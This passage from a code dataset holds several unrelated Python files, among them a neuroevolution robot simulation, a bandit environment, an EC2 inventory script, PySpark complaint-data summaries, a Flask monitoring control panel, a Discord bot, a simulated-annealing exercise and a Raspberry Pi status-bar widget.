networks = []\r\n for i in range(0, num):\r\n rnn = init_network(robot)\r\n randomize_network(rnn)\r\n networks.append(rnn)\r\n return networks\r\n \r\ndef distance(a, b):\r\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\r\n\r\nclass Processor:\r\n def __init__(self):\r\n self.iteration = 0\r\n\r\n def process_data(self, rnn_list):\r\n with open(\"data\", \"a\") as f:\r\n for rnn in rnn_list:\r\n f.write(\"{},{},{},{},{}\\n\".format(rnn.fitness, list(rnn.neurons.keys()), rnn.edges, rnn.input_layer, rnn.output_layer))\r\n f.write(\"------\")\r\n subprocess.run([\"git\", \"add\", \"data\"])\r\n subprocess.run([\"git\", \"commit\", \"-m\", \"\\\"updating data [{}]\\\"\".format(self.iteration)])\r\n subprocess.run([\"git\", \"push\", \"origin\", \"master\"])\r\n self.iteration += 1\r\n \r\ndef main():\r\n #pygame.init()\r\n #screen = pygame.display.set_mode(WINDOW_SIZE)\r\n #pygame.display.set_caption(\"SKS\")\r\n #clock = pygame.time.Clock()\r\n\r\n #draw_options = pymunk.pygame_util.DrawOptions(screen)\r\n\r\n terrain = init_terrain()\r\n environment = Environment(terrain)\r\n\r\n goal = Goal(950, 120)\r\n environment.add(goal)\r\n\r\n robot = init_robot()\r\n robot.rasterize((100, 100))\r\n robot.add_sensor(lambda a=robot.center_of_gravity, b=goal.shape.body.position: distance(a, b)/1000)\r\n \r\n random.seed()\r\n\r\n networks = init_population(robot, num=200)\r\n \r\n def fitness(network):\r\n if not network.processed:\r\n environment.add(robot)\r\n robot.save_state()\r\n\r\n elapsed = 0.0\r\n while elapsed <= 5.0:\r\n #for event in pygame.event.get():\r\n # if event.type == QUIT:\r\n # sys.exit(0)\r\n # elif event.type == KEYDOWN and event.key == K_ESCAPE:\r\n # sys.exit(0)\r\n\r\n network.process()\r\n \r\n environment.space.step(1/50.0)\r\n \r\n #screen.fill((255,255,255))\r\n \r\n #environment.space.debug_draw(draw_options)\r\n\r\n #pygame.display.flip()\r\n #clock.tick(50)\r\n\r\n elapsed += 1/50.0\r\n\r\n network.processed = True\r\n network.fitness = 1 - distance(robot.center_of_gravity, goal.shape.body.position)/1000\r\n \r\n environment.remove(robot)\r\n robot.load_state()\r\n\r\n return network.fitness \r\n \r\n gnarl = Gnarl()\r\n gnarl.population = networks\r\n 
gnarl.fitness = fitness\r\n gnarl.fitness_max = 1\r\n gnarl.remove_node_probability = 0.75\r\n gnarl.remove_node_mu = 2\r\n gnarl.add_node_probability = 0.75\r\n gnarl.add_node_mu = 3\r\n gnarl.remove_edge_probability = 0.75\r\n gnarl.remove_edge_mu = 4\r\n gnarl.add_edge_probability = 0.75\r\n gnarl.add_edge_mu = 5\r\n gnarl.iterations = 1000\r\n\r\n processor = Processor()\r\n for l in gnarl.run():\r\n processor.process_data(l)\r\n\r\nsys.exit(main())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"54273271","text":"# Copyright 2020 Google LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport gym\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport dice_rl.utils.common as common_utils\n\n\nclass Bandit(gym.Env):\n def __init__(self, num_arms=2,\n reward_power=3.0,\n reward_scale=0.9,\n generation_seed=0,\n loop=False):\n self._num_arms = num_arms\n self._reward_power = reward_power\n self._reward_scale = reward_scale\n self._loop = loop\n self._generate_bandit(generation_seed)\n\n self.observation_space = spaces.Discrete(1)\n self.action_space = spaces.Discrete(self._num_arms)\n\n self.seed()\n self.reset()\n\n def _generate_bandit(self, seed):\n gen_random, _ = seeding.np_random(seed)\n\n self._rewards = gen_random.random_sample([self._num_arms])\n self._rewards = self._reward_scale * self._rewards ** self._reward_power\n\n @property\n def rewards(self):\n return self._rewards\n\n @property\n def num_arms(self):\n return self._num_arms\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n return self._get_obs()\n\n def _get_obs(self):\n return 0\n\n def step(self, action):\n reward = self._rewards[action]\n sampled_reward = float(self.np_random.random_sample() <= reward)\n done = not self._loop\n return self._get_obs(), sampled_reward, done, {}\n\n\ndef get_bandit_policy(bandit_env, epsilon_explore=0.0, py=True,\n return_distribution=True):\n \"\"\"Creates an optimal policy for solving the bandit environment.\n\n Args:\n bandit_env: A bandit environment.\n epsilon_explore: Probability of sampling random action as opposed to optimal\n action.\n py: Whether to return Python policy (NumPy) or TF (Tensorflow).\n return_distribution: In the case of a TF policy, whether to return the\n full action distribution.\n\n Returns:\n A policy_fn that takes in an observation and returns a sampled action along\n with a dictionary containing policy information (e.g., log probability).\n A spec that determines the type of objects returned by policy_info.\n\n Raises:\n ValueError: If epsilon_explore is not a valid probability.\n \"\"\"\n if epsilon_explore < 0 or epsilon_explore > 1:\n raise 
ValueError('Invalid exploration value %f' % epsilon_explore)\n\n  optimal_action = np.argmax(bandit_env.rewards)\n  policy_distribution = np.ones([1, bandit_env.num_arms]) / bandit_env.num_arms\n  policy_distribution[0] *= epsilon_explore\n  policy_distribution[0, optimal_action] += 1 - epsilon_explore\n\n  def obs_to_index_fn(observation):\n    if py:\n      return np.array(observation, dtype=np.int32)\n    else:\n      return tf.cast(observation, tf.int32)\n\n  if py:\n    return common_utils.create_py_policy_from_table(\n        policy_distribution, obs_to_index_fn)\n  else:\n    return common_utils.create_tf_policy_from_table(\n        policy_distribution, obs_to_index_fn,\n        return_distribution=return_distribution)\n","sub_path":"environments/bandit.py","file_name":"bandit.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"537956912","text":"import time\n\ndef function_runtime_decorator(func):\n    def wrapper(*args,**kwargs):\n        start = time.time()\n        result = func(*args,**kwargs)\n        end = time.time()\n        print(func.__name__ + \" took \"+ str((end-start)*1000) + \" milliseconds\")\n        # return the wrapped function's value so the decorator is transparent\n        return result\n    return wrapper\n\n\n@function_runtime_decorator\ndef calculate_square(data):\n    result = []\n    for number in data:\n        answer = number*number\n        result.append(answer)\n    return result\n\n@function_runtime_decorator\ndef calculate_cube(data):\n    result = []\n    for number in data:\n        answer = number*number*number\n        result.append(answer)\n    return result\n\n\ndata = range(1,10000)\ncalculate_square(data)\ncalculate_cube(data)\n","sub_path":"ProgrammingLanguage/Python/DecoratorSample/Decorator.py","file_name":"Decorator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"607729319","text":"#!/bin/python\nimport sys\nimport json\n\ntry:\n    import boto3\nexcept ImportError:\n    print(\"Please install boto3 using pip install boto3 and try again\")\n    sys.exit(1)\nexcept Exception as e:\n    print(e)\n    sys.exit(2)\n\ndef get_hosts(all_ec2s,f_value):\n    custom_filter={\"Name\":\"tag:Environment\", \"Values\":[f_value]}\n    hosts=[]\n    for instance in all_ec2s.instances.filter(Filters=[custom_filter]):\n        hosts.append(instance.private_ip_address)\n    return hosts\n\n# main function which will poll all ec2 resources from us-east-1\ndef main():\n    all_ec2s=boto3.resource(\"ec2\",\"us-east-1\")\n    db_group=get_hosts(all_ec2s,\"db\")\n    web_group=get_hosts(all_ec2s,\"web\")\n    all_groups= { 'db': db_group,\n                  'web': web_group\n                }\n    print(json.dumps(all_groups))\n\nif __name__==\"__main__\":\n    main()","sub_path":"custom_dynamic_inventory.py","file_name":"custom_dynamic_inventory.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170565479","text":"from pyspark.sql import SQLContext\nfrom pyspark.sql.functions import isnan, when, count, col, length, desc, unix_timestamp, from_unixtime, avg\n\nsqlContext = SQLContext(sc)\n\n# read csv into dataframes\ndf = sqlContext.read.load('20*.csv', format='com.databricks.spark.csv', header='true', inferSchema='true')\n\n# Group By Year (assigned back to df so the per-year filters below can reference col('year'))\ndf = df.withColumn('year', col('Created Date').substr(7,4))\ndf.groupBy('year').count().show()\n\n# Group By Month\ndf = df.withColumn('month', col('Created Date').substr(0,2))\ndf.groupBy('month').count().show()\n\n# Group By Zip\ndf.groupBy('Incident Zip').count().sort('count',ascending=False).show()\n
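\n# The unix_timestamp/from_unixtime helpers are imported above but never used. As a\n# rough sketch of fuller date handling (this assumes the 311 export's 'Created Date'\n# uses the 'MM/dd/yyyy hh:mm:ss a' format, which is not verified here), a proper\n# timestamp column could be derived instead of slicing fixed substrings:\ndf = df.withColumn('created_ts', from_unixtime(unix_timestamp(col('Created Date'), 'MM/dd/yyyy hh:mm:ss a')))\n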
\n# Group By Closed Year\ndf = df.withColumn('year_close', col('Closed Date').substr(7,4))\ndf.groupBy('year_close').count().show()\n\n# Add Date column\ndf = df.withColumn('date', col('Created Date').substr(0,10))\ndf = df.withColumn('date_close', col('Closed Date').substr(0,10))\n\n# Get Daily Average Create\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('date').count().describe().show()\n\n# Get Daily Average Close\nfor x in range(2009,2018):\n    df.filter(col('year_close')==str(x)).groupBy('date_close').count().filter(length(col('date_close'))==10).agg(avg(col('count'))).show()\n\n# Get Most Complaint Type\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('Complaint Type').count().sort('count', ascending=False).take(1)\n\n# Get Most Complaint Zip Area\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('Incident Zip').count().sort('count', ascending=False).take(2)\n\n# Get Borough\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('Borough').count().sort('count', ascending=False).take(2)\n\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('Agency').count().sort('count', ascending=False).take(2)\n\nfor x in range(2009,2018):\n    df.filter(col('year')==str(x)).groupBy('Location Type').count().sort('count', ascending=False).take(2)\n","sub_path":"summary/summary-part1.py","file_name":"summary-part1.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"599523344","text":"import json\nimport os\n\nimport time\nfrom twisted.internet.task import LoopingCall\n\nfrom requestmgr import HTTPRequestManager\n\n\nclass ResourceMonitor(object):\n    \"\"\"\n    This class is responsible for monitoring resources in Tribler.\n    Specifically, it fetches information from the Tribler core and writes it to a file.\n    \"\"\"\n\n    def __init__(self, interval):\n        self.interval = interval\n        self.request_manager = HTTPRequestManager()\n        self.monitor_memory_lc = LoopingCall(self.monitor_memory)\n        self.monitor_cpu_lc = LoopingCall(self.monitor_cpu)\n        self.start_time = time.time()\n        self.latest_memory_time = 0\n        self.latest_cpu_time = 0\n\n        # Create the output directory if it does not exist yet\n        output_dir = os.path.join(os.getcwd(), \"output\")\n        if not os.path.exists(output_dir):\n            os.makedirs(output_dir)\n\n        self.memory_stats_file_path = os.path.join(output_dir, 'memory_stats.csv')\n        with open(self.memory_stats_file_path, \"w\") as output_file:\n            output_file.write(\"time,memory_usage\\n\")\n\n        self.cpu_stats_file_path = os.path.join(output_dir, 'cpu_stats.csv')\n        with open(self.cpu_stats_file_path, \"w\") as output_file:\n            output_file.write(\"time,cpu_usage\\n\")\n\n    def start(self):\n        \"\"\"\n        Start the monitoring loop for the resources.\n        \"\"\"\n        self.monitor_memory_lc.start(self.interval)\n        self.monitor_cpu_lc.start(self.interval)\n\n    def stop(self):\n        \"\"\"\n        Stop the monitoring loop for the resources.\n        \"\"\"\n        if self.monitor_memory_lc and self.monitor_memory_lc.running:\n            self.monitor_memory_lc.stop()\n            self.monitor_memory_lc = None\n\n        if self.monitor_cpu_lc and self.monitor_cpu_lc.running:\n            self.monitor_cpu_lc.stop()\n            self.monitor_cpu_lc = None\n\n    def on_memory_history(self, response):\n        history = json.loads(response)\n        for history_item in history[\"memory_history\"]:\n            if history_item[\"time\"] > self.latest_memory_time:\n                self.latest_memory_time = history_item[\"time\"]\n                time_diff = history_item[\"time\"] - self.start_time\n                with open(self.memory_stats_file_path, \"a\") as 
output_file:\n output_file.write(\"%s,%s\\n\" % (time_diff, history_item[\"mem\"]))\n\n def on_cpu_history(self, response):\n history = json.loads(response)\n for history_item in history[\"cpu_history\"]:\n if history_item[\"time\"] > self.latest_cpu_time:\n self.latest_cpu_time = history_item[\"time\"]\n time_diff = history_item[\"time\"] - self.start_time\n with open(self.cpu_stats_file_path, \"a\") as output_file:\n output_file.write(\"%s,%s\\n\" % (time_diff, history_item[\"cpu\"]))\n\n def monitor_memory(self):\n \"\"\"\n Monitor the memory usage in Tribler.\n \"\"\"\n return self.request_manager.get_memory_history_core().addCallback(self.on_memory_history)\n\n def monitor_cpu(self):\n \"\"\"\n Monitor the CPU usage in Tribler.\n \"\"\"\n return self.request_manager.get_cpu_history_core().addCallback(self.on_cpu_history)\n","sub_path":"resource_monitor.py","file_name":"resource_monitor.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2561054","text":"import socket\nimport requests\n# import json\nimport psutil\n\nfrom .html_templates import * # pylint: disable=unused-wildcard-import\n\n\n\nSTYLES = '''\n\n'''\n\n\nclass ControlPanel:\n\t'''Automatically scan ports and consolidate many TaskMonitors'''\n\n\tdef __init__(self,\n\t\tapp,\n\t\tports=[],\n\t\texternal_addrs=[],\n\t\tpage_refresh=60):\n\n\t\tself.app = app\n\t\tself.machine = socket.gethostname()\n\t\tself.local_ip = socket.gethostbyname(self.machine)\n\t\tself.ports = set(ports)\n\t\tself.external_addrs = set(external_addrs)\n\t\tself.page_refresh = page_refresh\n\t\tself.app.add_url_rule(\"/\", view_func=self._render_monitors, methods=['GET'])\n\n\n\tdef scan(self, min_port=1000, max_port=10000, timeout=5):\n\t\tfor conn in psutil.net_connections():\n\t\t\tif conn.status == \"LISTEN\" and conn.laddr.port >= min_port and conn.laddr.port <= max_port:\n\t\t\t\tm = self._get_taskmonitor(self.local_ip, conn.laddr.port, timeout=timeout)\n\t\t\t\tif m is not None:\n\t\t\t\t\tself.ports.add(conn.laddr.port)\n\t\t\t\tprint('>> scanned', conn.laddr.port, \"- found\" if m is not None else \"\")\n\n\n\tdef _get_taskmonitor(self, host, port, timeout=5):\n\t\ttry:\n\t\t\tmonitor_url = f\"http://{host}:{port}/@taskmonitor\" # need to add option to change this endpoint since task monitor has that option\n\t\t\tres = requests.get(f\"{monitor_url}/json/summary\", timeout=timeout).json()\n\t\t\t# print(json.dumps(res, indent=4))\n\t\t\tres['port'] = port\n\t\t\tres['url'] = monitor_url\n\t\t\treturn res\n\t\texcept Exception:\n\t\t\t# print(e)\n\t\t\treturn None\n\n\n\tdef _iter_monitors(self):\n\t\tfor port in self.ports:\n\t\t\tmonitor = self._get_taskmonitor(self.local_ip, port)\n\t\t\tif monitor is not None:\n\t\t\t\tyield monitor\n\t\tfor host, port in self.external_addrs:\n\t\t\tmonitor = self._get_taskmonitor(host, port)\n\t\t\tif monitor is not None:\n\t\t\t\tyield monitor\n\n\n\tdef _render_monitors(self):\n\t\tcontent = []\n\t\tfor monitor in self._iter_monitors():\n\t\t\tcss = ['monitor-block']\n\t\t\tattrs = {}\n\t\t\telem = \"\"\n\t\t\tif 'error' in monitor:\n\t\t\t\telem = H(5, monitor['error']) + SPAN(str(monitor['url']))\n\t\t\t\tcss.append('error-border')\n\t\t\t\tcss.append('no-page')\n\t\t\t\tattrs['title'] = monitor['error']\n\t\t\telse:\n\t\t\t\tmon = monitor['success']\n\t\t\t\terr_msg_css = []\n\t\t\t\tif mon['summary']['errors'] > 
0:\n\t\t\t\t\tcss.append('error-border')\n\t\t\t\t\terr_msg_css.append('error-msg')\n\t\t\t\tmsg = f\"tasks: {DIV(mon['summary']['count'])} errors: {DIV(mon['summary']['errors'], css=err_msg_css)}\"\n\t\t\t\telem = SPAN(B(mon['name']), css=['block-title']) + SPAN(msg, css=['block-msg'])\n\t\t\t\tattrs['data-url'] = monitor['url']\n\t\t\t\tattrs['title'] = f\"{mon['name']}\\n{monitor['url']}\"\n\t\t\tcontent.append(DIV(elem, css=css, attrs=attrs))\n\t\twrapper = DIV(''.join(content), css='wrapper')\n\t\theader_txt = f\"Control Panel\"\n\t\theader = DIV(H(2, header_txt), css=['header-bar'])\n\t\trerun_txt = SMALL(f\"Auto-refresh in {SPAN(self.page_refresh, attrs={'id': 'refresh-msg'})} seconds\")\n\n\t\tauto_reload = SCRIPT('''\n\t\tlet COUNT_DOWN = {page_refresh}\n\t\twindow.addEventListener('load', (event) => {{\n\t\t\tconst timer = setInterval(()=>{{\n\t\t\t\tif (COUNT_DOWN > 0) {{\n\t\t\t\t\tCOUNT_DOWN --\n\t\t\t\t\tdocument.getElementById('refresh-msg').innerText = COUNT_DOWN\n\t\t\t\t}} else {{\n\t\t\t\t\tclearInterval(timer)\n\t\t\t\t\tlocation.reload()\n\t\t\t\t}}\n\t\t\t}}, 1000)\n\t\t\tdocument.querySelectorAll('.monitor-block:not(.no-page)').forEach(block=>{{\n\t\t\t\tblock.addEventListener('click', ()=>{{\n\t\t\t\t\twindow.location.href=block.getAttribute(\"data-url\")\n\t\t\t\t}})\n\t\t\t}})\n\t\t}});\n\t\t'''.format(page_refresh=self.page_refresh))\n\t\treturn HTML(''.join([\n\t\t\tSTYLES,\n\t\t\theader,\n\t\t\trerun_txt,\n\t\t\twrapper,\n\t\t\tauto_reload\n\t\t]), title=header_txt)\n","sub_path":"flask_production/plugins/ctrl_panel.py","file_name":"ctrl_panel.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"530727823","text":"import discord\nimport asyncio\n\nclient = discord.Client()\nbotkey = \"\"\n\n@client.event\nasync def on_ready():\n\tprint (\"Logged in as:\")\n\tprint (client.user.name)\n\n@client.event\nasync def on_message(message):\n\tif \"blox\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"OOF\")\n\n\telif \"oofbot\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"You called?\")\n\n\telif \"robux\" in message.content.lower():\n\t\tmessage = await client.send_message(message.channel, \"$$$ https://www.roblox.com/upgrades/robux $$$\")\n\nclient.run(botkey)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518643169","text":"from numpy import cos, pi, exp, sqrt\r\nimport numpy as np\r\nfrom numpy.random import normal, seed\r\nfrom random import random\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import rc\r\n\r\nfont = {'family': 'DejaVu Sans', 'size': 14} # adjust fonts\r\nrc('font', **font)\r\n\r\nseed(2)\r\n\r\ndef f(x, y):\r\n \"\"\"\r\n Given function 1b(i) to find the minimum.\r\n \"\"\"\r\n return x**2 - cos(4*x*pi) + (y-1)**2\r\n\r\n\r\ndef g(x,y):\r\n \"\"\"\r\n Given function 1b(ii) to find the minimum.\r\n \"\"\"\r\n return cos(x) + cos(sqrt(2) * x) + cos(sqrt(3) * x) + (y-1)**2 \r\n\r\n\r\ndef run_b(func, q_name):\r\n # set the variables\r\n Tmax = 1.0\r\n Tmin = 1e-5\r\n tau = 1e4\r\n \r\n # Main loop\r\n t = 0\r\n T = Tmax\r\n # starting point\r\n x,y = 2,2\r\n # std and mean for gaussian distribution\r\n mean, std = 0, 1\r\n \r\n # to store the results\r\n time = []\r\n func_arr = []\r\n x_y_arr = []\r\n \r\n # compute the 
results initially\r\n    time.append(t)\r\n    x_y_arr.append([x,y])\r\n    func_arr.append(func(x,y))\r\n    \r\n    while T>Tmin:\r\n    \r\n        # Cooling\r\n        t += 1\r\n        T = Tmax*exp(-t/tau)\r\n        \r\n        # sample from a gaussian distribution\r\n        dx, dy = normal(mean, std, 2) \r\n        # Monte Carlo moves\r\n        new_x, new_y = x+dx, y+dy\r\n        \r\n        # find the change in energy\r\n        new_func = func(new_x, new_y)\r\n        delta_func = new_func - func_arr[-1]\r\n        \r\n        if q_name == 'bi':\r\n            if random() < exp(-delta_func/T):\r\n                # make move\r\n                x, y = new_x, new_y\r\n                # store the energy, time and moves\r\n                time.append(t)\r\n                x_y_arr.append([x,y])\r\n                func_arr.append(func(x,y))\r\n        else:\r\n            if 0 < new_x < 50 and -20 < new_y < 20 and random() < exp(-delta_func/T):\r\n                # make move\r\n                x, y = new_x, new_y\r\n                # store the energy, time and moves\r\n                time.append(t)\r\n                x_y_arr.append([x,y])\r\n                func_arr.append(func(x,y))\r\n    \r\n    print(\"The value of (x, y) for Qb({}) is ({:.3f}, {:.3f}).\".format(q_name[1:],x,y))\r\n    \r\n    x_y_arr = np.array(x_y_arr)\r\n    \r\n    # plot x as a function of time\r\n    plt.figure()\r\n    plt.scatter(time, x_y_arr[:, 0])\r\n    plt.xlabel(\"Time (t)\")\r\n    plt.ylabel(\"x\")\r\n    plt.title(\"Qb({}) x as a function of time\".format(q_name[1:]))\r\n    plt.grid()\r\n    plt.tight_layout()\r\n    plt.savefig(q_name + '_x.pdf')\r\n    \r\n    # plot y as a function of time\r\n    plt.figure()\r\n    plt.scatter(time, x_y_arr[:, 1], color='#f97306')\r\n    plt.xlabel(\"Time (t)\")\r\n    plt.ylabel(\"y\")\r\n    plt.title(\"Qb({}) y as a function of time\".format(q_name[1:]))\r\n    plt.grid()\r\n    plt.tight_layout()\r\n    plt.savefig(q_name + '_y.pdf')\r\n    \r\n    \r\n# run b(i)\r\nrun_b(f, 'bi')\r\n\r\n# run b(ii)\r\nrun_b(g, 'bii') \r\n \r\n","sub_path":"Markov Chain and Protien Folding (Lab11)/Q1/lab11_Q1b.py","file_name":"lab11_Q1b.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"499956533","text":"#!/usr/bin/python3\n# statusbar.py - creates a widget that shows the temperature of the RPI and the IP address if it is assigned.\n\nimport os, sys\nimport subprocess\nfrom tkinter import *\nimport datetime\nimport time\nimport logging\n\nclass Statusbar:\n\n    def __init__(self, window, relx=0.05, rely=0.55, width=0.1, height=0.1, anchor='nw', show=True):\n        self.logger = logging.getLogger('SM2.statusbar')\n\n        if __name__ == '__main__': # Creates a logger if the module is called directly.\n            ch = logging.StreamHandler()\n            formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n            ch.setFormatter(formatter)\n            self.logger.setLevel(logging.DEBUG)\n            self.logger.addHandler(ch)\n\n        self.logger.info('Initialization of STATUSBAR widget...')\n\n        self.REFRESH_RATE = 5000 # time in milliseconds between measurements.\n\n        self.window = window\n        # Dimensions of the main window (screen size)\n        self.window_width = window.winfo_screenwidth()\n        self.window_height = window.winfo_screenheight()\n\n        self.relx = relx\n        self.rely = rely\n        self.target_width = int(width * self.window_width)\n        self.target_height = int(height * self.window_height)\n        self.anchor = anchor\n        self.show = show\n\n        self.font_size = 50\n
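\n        # NOTE: 50 is only a generous starting value; get_font_size() below shrinks\n        # the font step by step until the rendered frame fits inside the target box\n        # computed above from the screen-relative width/height fractions.\n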
\n        self.statusbar_frame = Frame(self.window, bg='black', bd=0)\n\n        # with a 'ne' anchor, place() pins the widget's top-right corner, so shift\n        # relx from the left edge to the right edge of the target box\n        if self.anchor == 'ne':\n            self.relx += width\n\n        self.statusbar_frame.place(\n            relx=self.relx,\n            rely=self.rely,\n            anchor=self.anchor)\n\n        # The inner top frame is used to display the GPU temperature.\n        self.topframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n        self.topframe_inside.grid(column=0, row=0, sticky=self.anchor)\n\n        # The inner middle frame is used to display the CPU temperature.\n        self.middleframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n        self.middleframe_inside.grid(column=0, row=1, sticky=self.anchor)\n\n        # The inner bottom frame is used to display the IP address.\n        self.bottomframe_inside = Frame(self.statusbar_frame, bg='black', bd=0)\n        self.bottomframe_inside.grid(column=0, row=2, sticky=self.anchor)\n\n        self.temp_CPU = subprocess.Popen(\n            'cat /sys/class/thermal/thermal_zone0/temp',\n            shell=True, \n            stdin=None, \n            stdout=subprocess.PIPE, \n            stderr=subprocess.PIPE\n        )\n\n        _, temp_CPU_error = self.temp_CPU.communicate() \n        if temp_CPU_error.decode(\"utf-8\").find('not found') != -1:\n            self.logger.warning('CPU temperature measurement is not supported!')\n            self.temp_CPU.stdout.close()\n            self.temp_CPU = False\n        else:\n            self.temp_CPU = 'CPU __._°C'\n\n        self.temp_GPU = subprocess.Popen(\n            'vcgencmd measure_temp',\n            shell=True, \n            stdin=None, \n            stdout=subprocess.PIPE, \n            stderr=subprocess.PIPE\n        )\n\n        _, temp_GPU_error = self.temp_GPU.communicate() \n        if temp_GPU_error.decode(\"utf-8\").find('not found') != -1:\n            self.logger.warning('GPU temperature measurement is not supported!')\n            self.temp_GPU.stdout.close()\n            self.temp_GPU = False\n        else:\n            self.temp_GPU = 'GPU __._°C'\n        \n        self.IP_address = subprocess.Popen(\n            'hostname -I',\n            shell=True, \n            stdin=None, \n            stdout=subprocess.PIPE, \n            stderr=subprocess.PIPE\n        )\n\n        _, IP_address_error = self.IP_address.communicate() \n        if IP_address_error.decode(\"utf-8\").find('not found') != -1:\n            self.logger.warning('Cannot get the IP address!')\n            self.IP_address.stdout.close()\n            self.IP_address = False\n        else:\n            self.IP_address = 'IP: ___.___.___.___'\n\n        if self.temp_CPU:\n            self.cpu_temp_label = Label(\n                self.middleframe_inside,\n                text='CPU 21 °C',\n                fg='lightblue',\n                bg='black',\n                font=(\"SFUIText\", self.font_size, \"bold\")\n            )\n            if self.anchor == 'nw':\n                self.cpu_temp_label.pack(side=LEFT)\n            else:\n                self.cpu_temp_label.pack(side=RIGHT)\n\n        if self.temp_GPU:\n            self.gpu_temp_label = Label(\n                self.topframe_inside,\n                text='GPU 22 °C',\n                fg='lightblue',\n                bg='black',\n                font=(\"SFUIText\", self.font_size, \"bold\")\n            )\n            if self.anchor == 'nw':\n                self.gpu_temp_label.pack(side=LEFT)\n            else:\n                self.gpu_temp_label.pack(side=RIGHT)\n\n        if self.IP_address:\n            self.ip_address_label = Label(\n                self.bottomframe_inside,\n                text='000.000.000.000',\n                fg='lightblue',\n                bg='black',\n                font=(\"SFUIText\", self.font_size, \"bold\")\n            )\n            if self.anchor == 'nw':\n                self.ip_address_label.pack(side=LEFT)\n            else:\n                self.ip_address_label.pack(side=RIGHT)\n\n        self.window.update_idletasks()\n        self.get_font_size()\n\n        self.logger.info('STATUSBAR widget has been created.')\n        self.status()\n\n    def get_font_size(self):\n        \"\"\" The method decreases the font size until it satisfies the target\n        width and height of the widget.\"\"\"\n        while self.font_size > 12:\n            if self.temp_CPU:\n                self.cpu_temp_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n            if self.temp_GPU:\n                self.gpu_temp_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n            if self.IP_address:\n                self.ip_address_label.config(font=(\"SFUIText\", self.font_size, \"bold\"))\n\n            self.window.update_idletasks()\n\n            self.statusbar_frame_width = self.statusbar_frame.winfo_width()\n            self.statusbar_frame_height = self.statusbar_frame.winfo_height()\n            if self.statusbar_frame_width > self.target_width or self.statusbar_frame_height > 
self.target_height:\n self.font_size -= 1\n else:\n #self.logger.debug(f'Target widget width {self.target_width}')\n #self.logger.debug(f'Real widget width {int(self.statusbar_frame_width)}')\n #self.logger.debug(f'Target widget height {self.target_height}')\n #self.logger.debug(f'Real widget height {int(self.statusbar_frame_height)}')\n break\n\n def status(self):\n if self.show:\n self.statusbar_frame.place(\n relx=self.relx,\n rely=self.rely,\n anchor=self.anchor\n )\n self.widget()\n else:\n self.statusbar_frame.place_forget()\n self.statusbar_frame.after(1000, self.status)\n\n def widget(self):\n if self.temp_CPU:\n self.cpu_temp_label.config(text=self.temp_CPU)\n if self.temp_GPU:\n self.gpu_temp_label.config(text=self.temp_GPU)\n if self.IP_address:\n self.ip_address_label.config(text=self.IP_address)\n self.measure_temp_cpu()\n\n def measure_temp_cpu(self):\n if self.temp_CPU:\n try:\n self.temp_CPU = subprocess.Popen(\n 'cat /sys/class/thermal/thermal_zone0/temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n\n self.temp_CPU, _ = self.temp_CPU.communicate() \n self.temp_CPU = round(int(self.temp_CPU.decode('utf-8')) / 1000, 1)\n self.temp_CPU = f'CPU {str(self.temp_CPU)}°C'\n except Exception as exc:\n self.temp_CPU = ''\n self.logger.error(f'Cannot get the CPU temp: {exc}')\n\n if self.temp_GPU:\n self.statusbar_frame.after(self.REFRESH_RATE, self.measure_temp_gpu)\n else:\n if self.IP_address:\n self.statusbar_frame.after(self.REFRESH_RATE, self.get_ip_address)\n else:\n self.statusbar_frame.after(self.REFRESH_RATE, self.status)\n\n def measure_temp_gpu(self):\n try:\n self.temp_GPU = subprocess.Popen(\n 'vcgencmd measure_temp',\n shell=True, \n stdin=None, \n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE\n )\n self.temp_GPU, 